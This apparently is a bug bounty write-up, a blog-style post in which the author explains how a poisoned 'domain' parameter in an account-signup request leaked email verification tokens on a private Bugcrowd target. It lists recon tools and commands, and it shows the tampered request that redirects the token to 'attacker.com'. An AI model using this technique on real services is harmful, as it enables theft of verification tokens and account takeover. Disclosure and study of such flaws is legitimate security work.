How i am able to Steal email verification token By Host header Poisoning

Greeting Everyone ! I am pallab Twitter (@PJBorah2) Today I going to share my first Accepted p2 Bug I found on Bugcrowd Private program How I found Host header Poisoning token leak that allow me to bypass confirmation schema of targeted domain .

As Im Hunting On target site xyz.com First thing I Done My Recon Process so I try to gather all the subdomain So here I used subfinder + httpx and I collect all subdomain with their status code , As basically after using both combine tool I Look for Only 200 & 302 Response .

Command I used:

subfinder -d target.com-silent | httpx -title -content-length -status-code

After That I got Subdomain and I look for all the subdomain with Their Response code 200 & 302 As I spend My 1 days As I Basically spend at least 2 hrs for one subdomain so after I choose another subdomain it looks like ground.xyz.com.

So Here functionality that we can create Account . Before Creating Account I Always gathered some Information as i used tools,

For Directory Search : ffuf, dirsearch , wfuzz

For Content Discovery : gau, Paramspider, Waybackurl, httpx, Subfinder, sublist3r,

Then I gathered Information about target then i start my testing on targeted domain. Now, Let’s skip everything Let’s Reproduce How i able to Steal email verification token due to Host Header Poisoning .

Reproduce Of Testing Steps:

Step1:

I visit https://ground.target.com/ And Created New account Fill up form with Victim Email Which I am not authorized And capture Request Using Burp:

Step: 2.
In Request Section I see Functionality Based On Some third party API Service but it carried Original domain In Request section as “domain ” parameter As You see below request: ,

{“key”:”eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw”,
“template_id”:”xyz”,”domain”:”ground.xyz.com”}

Now, As above Here Change Request:

{“key”:”eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw”,
“template_id”:”xyz”,”domain”:”attacker.com”}

So i replace in domain name to attacker domain , and forward this request.
Step: 3.
Here As I used ngrok Server to capture request As Below Picture I Have confirmation token Which leak Through My supplied Server When the victim clicks the link ,

I successfully Submitted this Vulnerability With full proof o concept and finally I awarded with point because it was point only Bugcrowd private program.

Thank You , Hope You Enjoyed!

Stick With me On: Twitter PJBorah2

Linkedin: Pallab Jyoti Borah

I am pallab jyotti borah From Assam ! I am Professionally VAPT Analyst as Part time Bugbounty hunter